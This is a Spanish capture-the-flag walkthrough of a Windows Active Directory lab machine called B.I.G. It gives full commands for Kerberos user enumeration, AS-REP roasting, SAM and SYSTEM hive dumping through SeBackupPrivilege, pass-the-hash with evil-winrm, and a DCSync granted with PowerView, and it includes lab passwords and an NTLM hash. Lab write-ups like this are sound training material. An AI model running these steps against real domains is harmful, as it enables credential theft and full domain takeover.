B.I.G

B.I.G
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Windows Avanzado 07 Mayo 2024 K0B4KS

IP: 192.168.212.4 Dominio: bbr.thl

Enumeración

Big

Web corriendo bajo el puerto 80

Big

Hacemos un poco de web fuzzing y encontramos algunos archivos interesantes.

  • notify.txt
  • BigPoppa.txt
  • Hypnotize.txt
  • Juicy.txt
  • Skyisthelimit.txt
  • big1.jpg
  • big2.jpg
  • big3.jpg
  • big4.jpg

Big

Big

Big

# notify.txt
Who the hell did you hire to create the website!
Hiding keys in MD5 again!
I'm going to fire that guy

Puffy

Posibles usuarios

juicy
puffy

Probamos enumerar usarios validos con kerbrute y nos encontramos con que el usuario juicy es valido.

kerbrute userenum -d bbr.thl --dc 192.168.212.4 userslist.txt

Big

En este punto, teniendo un usuario valido nos faltaria la contraseña del mismo para de esta forma poder enumerar muchas más cosas del dominio.

Comprobamos si el usuario tiene habilitado el atributo de Kerberos Pre-Auth, pero vemos que no tenemos éxito.

impacket-GetNPUsers -usersfile userslist.txt bbr.thl/ -dc-ip 192.168.212.4

Big

Seguimos enumerando

Esteganografía

 echo -n 'It was all a dream' | md5sum
99ae77c0c0faf78b872f9f452e3eaa24  -
> steghide --extract -sf big2.jpg

La esteganografía es una técnica de ocultamiento de información que se remonta a la antigüedad. A diferencia de la criptografía, que se enfoca en encriptar el contenido para hacerlo ilegible, la esteganografía se centra en ocultar la existencia misma del mensaje. El objetivo es que un observador no autorizado no pueda detectar la presencia del mensaje oculto.

En la esteganografía digital, se oculta la información dentro de archivos digitales, como imágenes, audio o video, de manera que parezcan normales a simple vista. Este ocultamiento se logra mediante técnicas como la modificación del bit menos significativo en los archivos de imagen, la ocultación de datos en el espacio de color de una imagen o la inserción de información en el espectro de frecuencia de archivos de audio.

Esta técnica se utiliza en diversos ámbitos, desde la seguridad informática, donde se puede emplear para enviar mensajes secretos, hasta en la protección de derechos de autor y marcas de agua digitales. Sin embargo, también puede ser utilizada con propósitos maliciosos, como el espionaje cibernético o la distribución de contenido ilegal.

Obtenemos el archivo frase.txt el cual corresponde a la contraseña del usuario juicy.

Bigpoppa1972

Validamos las credenciales con netexec.

Big

Validamos las crendeciales con el protocolo winrm, vemos que pone Pwn3d! lo cual significa que podemos conectarnos a través de este protocolo.

Big

Nos conectamos y obtenemos la flag de user.txt.

adm_puffy

Ahora que tenemos credenciales validas, podemos enumerar más cosas, entre ellas usuarios.

nxc smb 192.168.212.4 -u 'juicy' -p 'Bigpoppa1972' --users

Big

Probamos ejecutar el ataque AS-REP Roast a Kerberos para recuperar el ticket de autenticación ya que el usuario adm_puffy tiene activo el atributo pre-auth activo.

Big

Genial. Crackeamos el hash usando como wordlist Skyisthelimit.txt.

Big

adm_puffy:Passwordsave@

Nos conectamos por winrm.

Enumeramos los privilegios.

Big

Vemos que tenemos la capacidad de realizar Backups.

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
cd Temp
download sam
download system

Ahora, podemos extraer los hashes desde el archivo SAM y SYSTEM usando pypykatz. Si no está presente en tu Kali Linux, puedes descargarlo desde su GitHub. Es una variante de Mimikatz pero en Python. Por lo tanto, podemos ejecutar su función de registro y luego usar el parámetro -sam para proporcionar la ruta a los archivos SAM y SYSTEM. Tan pronto como el comando se ejecuta, podemos ver en la siguiente demostración que hemos extraído con éxito los hashes NTLM de la cuenta de administrador y otros usuarios también.

pypykatz registry --sam sam system

Big

Ahora podemos hacer Pass The Hash y conectarnos como el usuario Administrator.

evil-winrm -i 192.168.212.4 -u "Administrator" -H bb1c50a48c37e053d2045cd5b55cd2f2

Escalación de privilegios intencionada

*Evil-WinRM* PS C:\Temp> net user adm_puffy /domain
User name                    adm_puffy
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/3/2024 1:16:48 PM
Password expires             6/14/2024 1:16:48 PM
Password changeable          5/4/2024 1:16:48 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/8/2024 8:26:51 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Special Permissions
                             *Privilege users
The command completed successfully.

Utilizando PowerView.ps1 asignamos la acl correspondiente para poder hacer el DCSync.

Add-DomainObjectAcl -TargetIdentity 'DC=bbr,DC=thl' -PrincipalIdentity adm_puffy -Rights DCSync -PrincipalDomain bbr.thl -TargetDomain bbr.thl -Verbose
impacket-secretsdump bbr.thl/adm_puffy:'Passwordsave@'@192.168.212.4

Big